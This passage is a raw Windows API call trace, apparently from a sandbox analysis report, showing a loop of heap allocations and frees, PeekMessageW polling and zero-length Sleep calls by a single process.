RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.831] Sleep (dwMilliseconds=0x0) [0263.831] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.831] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.831] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.831] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.832] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.832] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.832] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.832] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.832] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.832] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.832] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.832] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.832] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.832] Sleep (dwMilliseconds=0x0) [0263.832] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.832] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.832] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.832] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.833] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.833] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.833] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.833] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.833] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.833] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.833] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.833] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.833] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.833] Sleep (dwMilliseconds=0x0) [0263.833] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.833] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.833] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.833] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.833] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.834] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.834] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.834] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.834] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.834] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.834] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.834] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.834] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.834] Sleep (dwMilliseconds=0x0) [0263.834] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.834] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.834] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.834] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.834] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.834] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.835] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.835] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.835] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.835] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.835] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.835] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.835] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.835] Sleep (dwMilliseconds=0x0) [0263.835] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.835] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.835] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.835] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.835] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.835] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.835] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.836] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.836] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.836] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.836] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.836] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.836] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.836] Sleep (dwMilliseconds=0x0) [0263.836] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.836] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.836] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.836] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.836] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.836] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.836] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.836] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.837] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.837] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.837] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.837] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.837] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.837] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.837] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.837] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.837] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.837] Sleep (dwMilliseconds=0x0) [0263.837] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.837] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.837] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.837] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.837] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.837] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.837] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.837] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.837] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.837] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.837] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.837] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.837] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.837] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.837] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.838] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.838] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.838] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.838] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.838] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.838] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.838] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.838] Sleep (dwMilliseconds=0x0) [0263.838] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.838] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.838] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.838] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.838] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.838] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.838] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.838] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.838] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.838] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.838] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.838] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.838] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.838] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.838] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.838] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.838] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.839] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.839] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.839] Sleep (dwMilliseconds=0x0) [0263.839] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.839] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.839] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.839] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.839] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.839] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.839] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.839] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.839] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.839] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.839] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.839] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.839] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.840] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.840] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.840] Sleep (dwMilliseconds=0x0) [0263.840] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.840] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.840] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.840] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.840] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.840] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.840] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.840] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.840] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.840] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.840] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.840] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.840] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.840] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.840] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.840] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.840] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.840] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.840] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.840] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 